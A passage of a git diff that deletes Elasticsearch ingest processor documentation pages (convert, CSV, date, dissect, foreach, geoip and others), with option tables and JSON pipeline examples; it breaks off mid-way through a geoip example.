@@ -1,5 +0,0 @@ -| `if` | no | - | Conditionally execute this processor. -| `on_failure` | no | - | Handle failures for this processor. See <>. -| `ignore_failure` | no | `false` | Ignore failures for this processor. See <>. -| `tag` | no | - | An identifier for this processor. Useful for debugging and metrics. -// TODO: See <>. <-- for the if description once PR 35044 is merged \ No newline at end of file diff --git a/docs/reference/ingest/processors/convert.asciidoc b/docs/reference/ingest/processors/convert.asciidoc deleted file mode 100644 index 073c7933647..00000000000 --- a/docs/reference/ingest/processors/convert.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ -[[convert-processor]] -=== Convert processor -++++ -Convert -++++ - -Converts a field in the currently ingested document to a different type, such as converting a string to an integer. -If the field value is an array, all members will be converted. - -The supported types include: `integer`, `long`, `float`, `double`, `string`, `boolean`, and `auto`. - -Specifying `boolean` will set the field to true if its string value is equal to `true` (ignore case), to -false if its string value is equal to `false` (ignore case), or it will throw an exception otherwise. - -Specifying `auto` will attempt to convert the string-valued `field` into the closest non-string type. -For example, a field whose value is `"true"` will be converted to its respective boolean type: `true`. Do note -that float takes precedence of double in `auto`. A value of `"242.15"` will "automatically" be converted to -`242.15` of type `float`. If a provided field cannot be appropriately converted, the Convert Processor will -still process successfully and leave the field value as-is. In such a case, `target_field` will -still be updated with the unconverted field value. - -[[convert-options]] -.Convert Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field whose value is to be converted -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `type` | yes | - | The type to convert the existing value to -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -PUT _ingest/pipeline/my-pipeline-id -{ - "description": "converts the content of the id field to an integer", - "processors" : [ - { - "convert" : { - "field" : "id", - "type": "integer" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/csv.asciidoc b/docs/reference/ingest/processors/csv.asciidoc deleted file mode 100644 index e032fd3d9a1..00000000000 --- a/docs/reference/ingest/processors/csv.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[[csv-processor]] -=== CSV processor -++++ -CSV -++++ - -Extracts fields from CSV line out of a single text field within a document. Any empty field in CSV will be skipped. - -[[csv-options]] -.CSV Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to extract data from -| `target_fields` | yes | - | The array of fields to assign extracted values to -| `separator` | no | , | Separator used in CSV, has to be single character string -| `quote` | no | " | Quote used in CSV, has to be single character string -| `ignore_missing` | no | `true` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `trim` | no | `false` | Trim whitespaces in unquoted fields -| `empty_value` | no | - | Value used to fill empty fields, empty fields will be skipped if this is not provided. - Empty field is one with no value (2 consecutive separators) or empty quotes (`""`) -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "csv": { - "field": "my_field", - "target_fields": ["field1", "field2"] - } -} --------------------------------------------------- -// NOTCONSOLE - -If the `trim` option is enabled then any whitespace in the beginning and in the end of each unquoted field will be trimmed. -For example with configuration above, a value of `A, B` will result in field `field2` -having value `{nbsp}B` (with space at the beginning). If `trim` is enabled `A, B` will result in field `field2` -having value `B` (no whitespace). Quoted fields will be left untouched. diff --git a/docs/reference/ingest/processors/date-index-name.asciidoc b/docs/reference/ingest/processors/date-index-name.asciidoc deleted file mode 100644 index e4607a0567c..00000000000 --- a/docs/reference/ingest/processors/date-index-name.asciidoc +++ /dev/null @@ -1,145 +0,0 @@ -[[date-index-name-processor]] -=== Date index name processor -++++ -Date index name -++++ - -The purpose of this processor is to point documents to the right time based index based -on a date or timestamp field in a document by using the <>. - -The processor sets the `_index` metadata field with a date math index name expression based on the provided index name -prefix, a date or timestamp field in the documents being processed and the provided date rounding. - -First, this processor fetches the date or timestamp from a field in the document being processed. Optionally, -date formatting can be configured on how the field's value should be parsed into a date. Then this date, -the provided index name prefix and the provided date rounding get formatted into a date math index name expression. -Also here optionally date formatting can be specified on how the date should be formatted into a date math index name -expression. - -An example pipeline that points documents to a monthly index that starts with a `my-index-` prefix based on a -date in the `date1` field: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/monthlyindex -{ - "description": "monthly date-time index naming", - "processors" : [ - { - "date_index_name" : { - "field" : "date1", - "index_name_prefix" : "my-index-", - "date_rounding" : "M" - } - } - ] -} --------------------------------------------------- - - -Using that pipeline for an index request: - -[source,console] --------------------------------------------------- -PUT /my-index/_doc/1?pipeline=monthlyindex -{ - "date1" : "2016-04-25T12:02:01.789Z" -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-2016-04-01", - "_type" : "_doc", - "_id" : "1", - "_version" : 1, - "result" : "created", - "_shards" : { - "total" : 2, - "successful" : 1, - "failed" : 0 - }, - "_seq_no" : 55, - "_primary_term" : 1 -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -The above request will not index this document into the `my-index` index, but into the `my-index-2016-04-01` index because -it was rounded by month. This is because the date-index-name-processor overrides the `_index` property of the document. - -To see the date-math value of the index supplied in the actual index request which resulted in the above document being -indexed into `my-index-2016-04-01` we can inspect the effects of the processor using a simulate request. - - -[source,console] --------------------------------------------------- -POST _ingest/pipeline/_simulate -{ - "pipeline" : - { - "description": "monthly date-time index naming", - "processors" : [ - { - "date_index_name" : { - "field" : "date1", - "index_name_prefix" : "my-index-", - "date_rounding" : "M" - } - } - ] - }, - "docs": [ - { - "_source": { - "date1": "2016-04-25T12:02:01.789Z" - } - } - ] -} --------------------------------------------------- - -and the result: - -[source,console-result] --------------------------------------------------- -{ - "docs" : [ - { - "doc" : { - "_id" : "_id", - "_index" : "", - "_type" : "_doc", - "_source" : { - "date1" : "2016-04-25T12:02:01.789Z" - }, - "_ingest" : { - "timestamp" : "2016-11-08T19:43:03.850+0000" - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/2016-11-08T19:43:03.850\+0000/$body.docs.0.doc._ingest.timestamp/] - -The above example shows that `_index` was set to ``. Elasticsearch -understands this to mean `2016-04-01` as is explained in the <> - -[[date-index-name-options]] -.Date index name options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to get the date or timestamp from. -| `index_name_prefix` | no | - | A prefix of the index name to be prepended before the printed date. Supports <>. -| `date_rounding` | yes | - | How to round the date when formatting the date into the index name. Valid values are: `y` (year), `M` (month), `w` (week), `d` (day), `h` (hour), `m` (minute) and `s` (second). Supports <>. -| `date_formats` | no | yyyy-MM-dd+++'T'+++HH:mm:ss.SSSXX | An array of the expected date formats for parsing dates / timestamps in the document being preprocessed. Can be a java time pattern or one of the following formats: ISO8601, UNIX, UNIX_MS, or TAI64N. -| `timezone` | no | UTC | The timezone to use when parsing the date and when date math index supports resolves expressions into concrete index names. -| `locale` | no | ENGLISH | The locale to use when parsing the date from the document being preprocessed, relevant when parsing month names or week days. -| `index_name_format` | no | yyyy-MM-dd | The format to be used when printing the parsed date into the index name. A valid java time pattern is expected here. Supports <>. -include::common-options.asciidoc[] -|====== diff --git a/docs/reference/ingest/processors/date.asciidoc b/docs/reference/ingest/processors/date.asciidoc deleted file mode 100644 index ae05afa422c..00000000000 --- a/docs/reference/ingest/processors/date.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[date-processor]] -=== Date processor -++++ -Date -++++ - -Parses dates from fields, and then uses the date or timestamp as the timestamp for the document. -By default, the date processor adds the parsed date as a new field called `@timestamp`. You can specify a -different field by setting the `target_field` configuration parameter. Multiple date formats are supported -as part of the same date processor definition. They will be used sequentially to attempt parsing the date field, -in the same order they were defined as part of the processor definition. - -[[date-options]] -.Date options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to get the date from. -| `target_field` | no | @timestamp | The field that will hold the parsed date. -| `formats` | yes | - | An array of the expected date formats. Can be a <> or one of the following formats: ISO8601, UNIX, UNIX_MS, or TAI64N. -| `timezone` | no | UTC | The timezone to use when parsing the date. Supports <>. -| `locale` | no | ENGLISH | The locale to use when parsing the date, relevant when parsing month names or week days. Supports <>. -| `output_format` | no | `yyyy-MM-dd'T'HH:mm:ss.SSSXXX` | The format to use when writing the date to `target_field`. Can be a <> or one of the following formats: ISO8601, UNIX, UNIX_MS, or TAI64N. -include::common-options.asciidoc[] -|====== - -Here is an example that adds the parsed date to the `timestamp` field based on the `initial_date` field: - -[source,js] --------------------------------------------------- -{ - "description" : "...", - "processors" : [ - { - "date" : { - "field" : "initial_date", - "target_field" : "timestamp", - "formats" : ["dd/MM/yyyy HH:mm:ss"], - "timezone" : "Europe/Amsterdam" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -The `timezone` and `locale` processor parameters are templated. This means that their values can be -extracted from fields within documents. The example below shows how to extract the locale/timezone -details from existing fields, `my_timezone` and `my_locale`, in the ingested document that contain -the timezone and locale values. - -[source,js] --------------------------------------------------- -{ - "description" : "...", - "processors" : [ - { - "date" : { - "field" : "initial_date", - "target_field" : "timestamp", - "formats" : ["ISO8601"], - "timezone" : "{{my_timezone}}", - "locale" : "{{my_locale}}" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/dissect.asciidoc b/docs/reference/ingest/processors/dissect.asciidoc deleted file mode 100644 index b7c5fbaf952..00000000000 --- a/docs/reference/ingest/processors/dissect.asciidoc +++ /dev/null @@ -1,201 +0,0 @@ -[[dissect-processor]] -=== Dissect processor -++++ -Dissect -++++ - - -Similar to the <>, dissect also extracts structured fields out of a single text field -within a document. However unlike the <>, dissect does not use -{wikipedia}/Regular_expression[Regular Expressions]. This allows dissect's syntax to be simple and for -some cases faster than the <>. - -Dissect matches a single text field against a defined pattern. - -For example the following pattern: -[source,txt] --------------------------------------------------- -%{clientip} %{ident} %{auth} [%{@timestamp}] \"%{verb} %{request} HTTP/%{httpversion}\" %{status} %{size} --------------------------------------------------- -will match a log line of this format: -[source,txt] --------------------------------------------------- -1.2.3.4 - - [30/Apr/1998:22:00:52 +0000] \"GET /english/venues/cities/images/montpellier/18.gif HTTP/1.0\" 200 3171 --------------------------------------------------- -and result in a document with the following fields: -[source,js] --------------------------------------------------- -"doc": { - "_index": "_index", - "_type": "_type", - "_id": "_id", - "_source": { - "request": "/english/venues/cities/images/montpellier/18.gif", - "auth": "-", - "ident": "-", - "verb": "GET", - "@timestamp": "30/Apr/1998:22:00:52 +0000", - "size": "3171", - "clientip": "1.2.3.4", - "httpversion": "1.0", - "status": "200" - } -} --------------------------------------------------- -// NOTCONSOLE - -A dissect pattern is defined by the parts of the string that will be discarded. In the example above the first part -to be discarded is a single space. Dissect finds this space, then assigns the value of `clientip` is everything up -until that space. -Later dissect matches the `[` and then `]` and then assigns `@timestamp` to everything in-between `[` and `]`. -Paying special attention the parts of the string to discard will help build successful dissect patterns. - -Successful matches require all keys in a pattern to have a value. If any of the `%{keyname}` defined in the pattern do -not have a value, then an exception is thrown and may be handled by the <> directive. -An empty key `%{}` or a <> can be used to match values, but exclude the value from -the final document. All matched values are represented as string data types. The <> -may be used to convert to expected data type. - -Dissect also supports <> that can change dissect's default -behavior. For example you can instruct dissect to ignore certain fields, append fields, skip over padding, etc. -See <> for more information. - -[[dissect-options]] -.Dissect Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to dissect -| `pattern` | yes | - | The pattern to apply to the field -| `append_separator`| no | "" (empty string) | The character(s) that separate the appended fields. -| `ignore_missing` | no | false | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "dissect": { - "field": "message", - "pattern" : "%{clientip} %{ident} %{auth} [%{@timestamp}] \"%{verb} %{request} HTTP/%{httpversion}\" %{status} %{size}" - } -} --------------------------------------------------- -// NOTCONSOLE - -[[dissect-key-modifiers]] -==== Dissect key modifiers -Key modifiers can change the default behavior for dissection. Key modifiers may be found on the left or right -of the `%{keyname}` always inside the `%{` and `}`. For example `%{+keyname ->}` has the append and right padding -modifiers. - -[[dissect-key-modifiers-table]] -.Dissect Key Modifiers -[options="header"] -|====== -| Modifier | Name | Position | Example | Description | Details -| `->` | Skip right padding | (far) right | `%{keyname1->}` | Skips any repeated characters to the right | <> -| `+` | Append | left | `%{+keyname} %{+keyname}` | Appends two or more fields together | <> -| `+` with `/n` | Append with order | left and right | `%{+keyname/2} %{+keyname/1}` | Appends two or more fields together in the order specified | <> -| `?` | Named skip key | left | `%{?ignoreme}` | Skips the matched value in the output. Same behavior as `%{}`| <> -| `*` and `&` | Reference keys | left | `%{*r1} %{&r1}` | Sets the output key as value of `*` and output value of `&` | <> -|====== - -[[dissect-modifier-skip-right-padding]] -===== Right padding modifier (`->`) - -The algorithm that performs the dissection is very strict in that it requires all characters in the pattern to match -the source string. For example, the pattern `%{fookey} %{barkey}` (1 space), will match the string "foo{nbsp}bar" -(1 space), but will not match the string "foo{nbsp}{nbsp}bar" (2 spaces) since the pattern has only 1 space and the -source string has 2 spaces. - -The right padding modifier helps with this case. Adding the right padding modifier to the pattern `%{fookey->} %{barkey}`, -It will now will match "foo{nbsp}bar" (1 space) and "foo{nbsp}{nbsp}bar" (2 spaces) -and even "foo{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}bar" (10 spaces). - -Use the right padding modifier to allow for repetition of the characters after a `%{keyname->}`. - -The right padding modifier may be placed on any key with any other modifiers. It should always be the furthest right -modifier. For example: `%{+keyname/1->}` and `%{->}` - -Right padding modifier example -|====== -| *Pattern* | `%{ts->} %{level}` -| *Input* | 1998-08-10T17:15:42,466{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}WARN -| *Result* a| -* ts = 1998-08-10T17:15:42,466 -* level = WARN -|====== - -The right padding modifier may be used with an empty key to help skip unwanted data. For example, the same input string, but wrapped with brackets requires the use of an empty right padded key to achieve the same result. - -Right padding modifier with empty key example -|====== -| *Pattern* | `[%{ts}]%{->}[%{level}]` -| *Input* | [1998-08-10T17:15:42,466]{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}[WARN] -| *Result* a| -* ts = 1998-08-10T17:15:42,466 -* level = WARN -|====== - -[[append-modifier]] -===== Append modifier (`+`) -[[dissect-modifier-append-key]] -Dissect supports appending two or more results together for the output. -Values are appended left to right. An append separator can be specified. -In this example the append_separator is defined as a space. - -Append modifier example -|====== -| *Pattern* | `%{+name} %{+name} %{+name} %{+name}` -| *Input* | john jacob jingleheimer schmidt -| *Result* a| -* name = john jacob jingleheimer schmidt -|====== - -[[append-order-modifier]] -===== Append with order modifier (`+` and `/n`) -[[dissect-modifier-append-key-with-order]] -Dissect supports appending two or more results together for the output. -Values are appended based on the order defined (`/n`). An append separator can be specified. -In this example the append_separator is defined as a comma. - -Append with order modifier example -|====== -| *Pattern* | `%{+name/2} %{+name/4} %{+name/3} %{+name/1}` -| *Input* | john jacob jingleheimer schmidt -| *Result* a| -* name = schmidt,john,jingleheimer,jacob -|====== - -[[named-skip-key]] -===== Named skip key (`?`) -[[dissect-modifier-named-skip-key]] -Dissect supports ignoring matches in the final result. This can be done with an empty key `%{}`, but for readability -it may be desired to give that empty key a name. - -Named skip key modifier example -|====== -| *Pattern* | `%{clientip} %{?ident} %{?auth} [%{@timestamp}]` -| *Input* | 1.2.3.4 - - [30/Apr/1998:22:00:52 +0000] -| *Result* a| -* clientip = 1.2.3.4 -* @timestamp = 30/Apr/1998:22:00:52 +0000 -|====== - -[[reference-keys]] -===== Reference keys (`*` and `&`) -[[dissect-modifier-reference-keys]] -Dissect support using parsed values as the key/value pairings for the structured content. Imagine a system that -partially logs in key/value pairs. Reference keys allow you to maintain that key/value relationship. - -Reference key modifier example -|====== -| *Pattern* | `[%{ts}] [%{level}] %{*p1}:%{&p1} %{*p2}:%{&p2}` -| *Input* | [2018-08-10T17:15:42,466] [ERR] ip:1.2.3.4 error:REFUSED -| *Result* a| -* ts = 1998-08-10T17:15:42,466 -* level = ERR -* ip = 1.2.3.4 -* error = REFUSED -|====== diff --git a/docs/reference/ingest/processors/dot-expand.asciidoc b/docs/reference/ingest/processors/dot-expand.asciidoc deleted file mode 100644 index 13cc6e72145..00000000000 --- a/docs/reference/ingest/processors/dot-expand.asciidoc +++ /dev/null @@ -1,122 +0,0 @@ -[[dot-expand-processor]] -=== Dot expander processor -++++ -Dot expander -++++ - -Expands a field with dots into an object field. This processor allows fields -with dots in the name to be accessible by other processors in the pipeline. -Otherwise these <> can't be accessed by any processor. - -[[dot-expander-options]] -.Dot Expand Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to expand into an object field -| `path` | no | - | The field that contains the field to expand. Only required if the field to expand is part another object field, because the `field` option can only understand leaf fields. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "dot_expander": { - "field": "foo.bar" - } -} --------------------------------------------------- -// NOTCONSOLE - -For example the dot expand processor would turn this document: - -[source,js] --------------------------------------------------- -{ - "foo.bar" : "value" -} --------------------------------------------------- -// NOTCONSOLE - -into: - -[source,js] --------------------------------------------------- -{ - "foo" : { - "bar" : "value" - } -} --------------------------------------------------- -// NOTCONSOLE - -If there is already a `bar` field nested under `foo` then -this processor merges the `foo.bar` field into it. If the field is -a scalar value then it will turn that field into an array field. - -For example, the following document: - -[source,js] --------------------------------------------------- -{ - "foo.bar" : "value2", - "foo" : { - "bar" : "value1" - } -} --------------------------------------------------- -// NOTCONSOLE - -is transformed by the `dot_expander` processor into: - -[source,js] --------------------------------------------------- -{ - "foo" : { - "bar" : ["value1", "value2"] - } -} --------------------------------------------------- -// NOTCONSOLE - -If any field outside of the leaf field conflicts with a pre-existing field of the same name, -then that field needs to be renamed first. - -Consider the following document: - -[source,js] --------------------------------------------------- -{ - "foo": "value1", - "foo.bar": "value2" -} --------------------------------------------------- -// NOTCONSOLE - -Then the `foo` needs to be renamed first before the `dot_expander` -processor is applied. So in order for the `foo.bar` field to properly -be expanded into the `bar` field under the `foo` field the following -pipeline should be used: - -[source,js] --------------------------------------------------- -{ - "processors" : [ - { - "rename" : { - "field" : "foo", - "target_field" : "foo.bar"" - } - }, - { - "dot_expander": { - "field": "foo.bar" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -The reason for this is that Ingest doesn't know how to automatically cast -a scalar field to an object field. diff --git a/docs/reference/ingest/processors/drop.asciidoc b/docs/reference/ingest/processors/drop.asciidoc deleted file mode 100644 index 18d9d311ac0..00000000000 --- a/docs/reference/ingest/processors/drop.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[[drop-processor]] -=== Drop processor -++++ -Drop -++++ - -Drops the document without raising any errors. This is useful to prevent the document from -getting indexed based on some condition. - -[[drop-options]] -.Drop Options -[options="header"] -|====== -| Name | Required | Default | Description -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "drop": { - "if" : "ctx.network_name == 'Guest'" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/enrich.asciidoc b/docs/reference/ingest/processors/enrich.asciidoc deleted file mode 100644 index 26fb2f1769c..00000000000 --- a/docs/reference/ingest/processors/enrich.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[enrich-processor]] -=== Enrich processor -++++ -Enrich -++++ - -The `enrich` processor can enrich documents with data from another index. -See <> section for more information about how to set this up. - -[[enrich-options]] -.Enrich Options -[options="header"] -|====== -| Name | Required | Default | Description -| `policy_name` | yes | - | The name of the enrich policy to use. -| `field` | yes | - | The field in the input document that matches the policies match_field used to retrieve the enrichment data. Supports <>. -| `target_field` | yes | - | Field added to incoming documents to contain enrich data. This field contains both the `match_field` and `enrich_fields` specified in the <>. Supports <>. -| `ignore_missing` | no | false | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `override` | no | true | If processor will update fields with pre-existing non-null-valued field. When set to `false`, such fields will not be touched. -| `max_matches` | no | 1 | The maximum number of matched documents to include under the configured target field. The `target_field` will be turned into a json array if `max_matches` is higher than 1, otherwise `target_field` will become a json object. In order to avoid documents getting too large, the maximum allowed value is 128. -| `shape_relation` | no | `INTERSECTS` | A spatial relation operator used to match the <> of incoming documents to documents in the enrich index. This option is only used for `geo_match` enrich policy types. The <> mapping parameter determines which spatial relation operators are available. See <<_spatial_relations>> for operators and more information. - -include::common-options.asciidoc[] -|====== diff --git a/docs/reference/ingest/processors/fail.asciidoc b/docs/reference/ingest/processors/fail.asciidoc deleted file mode 100644 index 4446b941db3..00000000000 --- a/docs/reference/ingest/processors/fail.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[fail-processor]] -=== Fail processor -++++ -Fail -++++ - -Raises an exception. This is useful for when -you expect a pipeline to fail and want to relay a specific message -to the requester. - -[[fail-options]] -.Fail Options -[options="header"] -|====== -| Name | Required | Default | Description -| `message` | yes | - | The error message thrown by the processor. Supports <>. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "fail": { - "if" : "ctx.tags.contains('production') != true", - "message": "The production tag is not present, found tags: {{tags}}" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/foreach.asciidoc b/docs/reference/ingest/processors/foreach.asciidoc deleted file mode 100644 index 7a8c29ff24a..00000000000 --- a/docs/reference/ingest/processors/foreach.asciidoc +++ /dev/null @@ -1,163 +0,0 @@ -[[foreach-processor]] -=== Foreach processor -++++ -Foreach -++++ - -Processes elements in an array of unknown length. - -All processors can operate on elements inside an array, but if all elements of an array need to -be processed in the same way, defining a processor for each element becomes cumbersome and tricky -because it is likely that the number of elements in an array is unknown. For this reason the `foreach` -processor exists. By specifying the field holding array elements and a processor that -defines what should happen to each element, array fields can easily be preprocessed. - -A processor inside the foreach processor works in the array element context and puts that in the ingest metadata -under the `_ingest._value` key. If the array element is a json object it holds all immediate fields of that json object. -and if the nested object is a value is `_ingest._value` just holds that value. Note that if a processor prior to the -`foreach` processor used `_ingest._value` key then the specified value will not be available to the processor inside -the `foreach` processor. The `foreach` processor does restore the original value, so that value is available to processors -after the `foreach` processor. - -Note that any other field from the document are accessible and modifiable like with all other processors. This processor -just puts the current array element being read into `_ingest._value` ingest metadata attribute, so that it may be -pre-processed. - -If the `foreach` processor fails to process an element inside the array, and no `on_failure` processor has been specified, -then it aborts the execution and leaves the array unmodified. - -[[foreach-options]] -.Foreach Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The array field -| `processor` | yes | - | The processor to execute against each field -| `ignore_missing` | no | false | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -Assume the following document: - -[source,js] --------------------------------------------------- -{ - "values" : ["foo", "bar", "baz"] -} --------------------------------------------------- -// NOTCONSOLE - -When this `foreach` processor operates on this sample document: - -[source,js] --------------------------------------------------- -{ - "foreach" : { - "field" : "values", - "processor" : { - "uppercase" : { - "field" : "_ingest._value" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -Then the document will look like this after preprocessing: - -[source,js] --------------------------------------------------- -{ - "values" : ["FOO", "BAR", "BAZ"] -} --------------------------------------------------- -// NOTCONSOLE - -Let's take a look at another example: - -[source,js] --------------------------------------------------- -{ - "persons" : [ - { - "id" : "1", - "name" : "John Doe" - }, - { - "id" : "2", - "name" : "Jane Doe" - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -In this case, the `id` field needs to be removed, -so the following `foreach` processor is used: - -[source,js] --------------------------------------------------- -{ - "foreach" : { - "field" : "persons", - "processor" : { - "remove" : { - "field" : "_ingest._value.id" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -After preprocessing the result is: - -[source,js] --------------------------------------------------- -{ - "persons" : [ - { - "name" : "John Doe" - }, - { - "name" : "Jane Doe" - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -The wrapped processor can have a `on_failure` definition. -For example, the `id` field may not exist on all person objects. -Instead of failing the index request, you can use an `on_failure` -block to send the document to the 'failure_index' index for later inspection: - -[source,js] --------------------------------------------------- -{ - "foreach" : { - "field" : "persons", - "processor" : { - "remove" : { - "field" : "_value.id", - "on_failure" : [ - { - "set" : { - "field": "_index", - "value": "failure_index" - } - } - ] - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -In this example, if the `remove` processor does fail, then -the array elements that have been processed thus far will -be updated. - -Another advanced example can be found in the {plugins}/ingest-attachment-with-arrays.html[attachment processor documentation]. diff --git a/docs/reference/ingest/processors/geoip.asciidoc b/docs/reference/ingest/processors/geoip.asciidoc deleted file mode 100644 index 92ed0a09dc7..00000000000 --- a/docs/reference/ingest/processors/geoip.asciidoc +++ /dev/null @@ -1,316 +0,0 @@ -[[geoip-processor]] -=== GeoIP processor -++++ -GeoIP -++++ - -The `geoip` processor adds information about the geographical location of IP addresses, based on data from the Maxmind databases. -This processor adds this information by default under the `geoip` field. The `geoip` processor can resolve both IPv4 and -IPv6 addresses. - -The `ingest-geoip` module ships by default with the GeoLite2 City, GeoLite2 Country and GeoLite2 ASN GeoIP2 databases from Maxmind made available -under the CCA-ShareAlike 4.0 license. For more details see, http://dev.maxmind.com/geoip/geoip2/geolite2/ - -The `geoip` processor can run with other city, country and ASN GeoIP2 databases -from Maxmind. The database files must be copied into the `ingest-geoip` config -directory located at `$ES_CONFIG/ingest-geoip`. Custom database files must be -stored uncompressed and the extension must be `-City.mmdb`, `-Country.mmdb`, or -`-ASN.mmdb` to indicate the type of the database. These database files can not -have the same filename as any of the built-in database names. The -`database_file` processor option is used to specify the filename of the custom -database to use for the processor. - -[[using-ingest-geoip]] -==== Using the `geoip` Processor in a Pipeline - -[[ingest-geoip-options]] -.`geoip` options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to get the ip address from for the geographical lookup. -| `target_field` | no | geoip | The field that will hold the geographical information looked up from the Maxmind database. -| `database_file` | no | GeoLite2-City.mmdb | The database filename referring to a database the module ships with (GeoLite2-City.mmdb, GeoLite2-Country.mmdb, or GeoLite2-ASN.mmdb) or a custom database in the `ingest-geoip` config directory. -| `properties` | no | [`continent_name`, `country_iso_code`, `country_name`, `region_iso_code`, `region_name`, `city_name`, `location`] * | Controls what properties are added to the `target_field` based on the geoip lookup. -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `first_only` | no | `true` | If `true` only first found geoip data will be returned, even if `field` contains array -|====== - -*Depends on what is available in `database_file`: - -* If the GeoLite2 City database is used, then the following fields may be added under the `target_field`: `ip`, -`country_iso_code`, `country_name`, `continent_name`, `region_iso_code`, `region_name`, `city_name`, `timezone`, `latitude`, `longitude` -and `location`. The fields actually added depend on what has been found and which properties were configured in `properties`. -* If the GeoLite2 Country database is used, then the following fields may be added under the `target_field`: `ip`, -`country_iso_code`, `country_name` and `continent_name`. The fields actually added depend on what has been found and which properties -were configured in `properties`. -* If the GeoLite2 ASN database is used, then the following fields may be added under the `target_field`: `ip`, -`asn`, `organization_name` and `network`. The fields actually added depend on what has been found and which properties were configured -in `properties`. - - -Here is an example that uses the default city database and adds the geographical information to the `geoip` field based on the `ip` field: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/geoip -{ - "description" : "Add geoip info", - "processors" : [ - { - "geoip" : { - "field" : "ip" - } - } - ] -} -PUT my-index-00001/_doc/my_id?pipeline=geoip -{ - "ip": "8.8.8.8" -} -GET my-index-00001/_doc/my_id --------------------------------------------------- - -Which returns: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "my-index-00001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 55, - "_primary_term": 1, - "_source": { - "ip": "8.8.8.8", - "geoip": { - "continent_name": "North America", - "country_name": "United States", - "country_iso_code": "US", - "location": { "lat": 37.751, "lon": -97.822 } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term":1/"_primary_term" : $body._primary_term/] - -Here is an example that uses the default country database and adds the -geographical information to the `geo` field based on the `ip` field. Note that -this database is included in the module. So this: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/geoip -{ - "description" : "Add geoip info", - "processors" : [ - { - "geoip" : { - "field" : "ip", - "target_field" : "geo", - "database_file" : "GeoLite2-Country.mmdb" - } - } - ] -} -PUT my-index-00001/_doc/my_id?pipeline=geoip -{ - "ip": "8.8.8.8" -} -GET my-index-00001/_doc/my_id --------------------------------------------------- - -returns this: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "my-index-00001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 65, - "_primary_term": 1, - "_source": { - "ip": "8.8.8.8", - "geo": { - "continent_name": "North America", - "country_name": "United States", - "country_iso_code": "US", - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -Not all IP addresses find geo information from the database, When this -occurs, no `target_field` is inserted into the document. - -Here is an example of what documents will be indexed as when information for "80.231.5.0" -cannot be found: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/geoip -{ - "description" : "Add geoip info", - "processors" : [ - { - "geoip" : { - "field" : "ip" - } - } - ] -} - -PUT my-index-00001/_doc/my_id?pipeline=geoip -{ - "ip": "80.231.5.0" -} - -GET my-index-00001/_doc/my_id 